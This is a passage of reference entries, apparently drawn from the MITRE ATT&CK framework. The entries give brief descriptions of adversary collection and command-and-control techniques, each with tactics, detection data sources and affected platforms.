Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre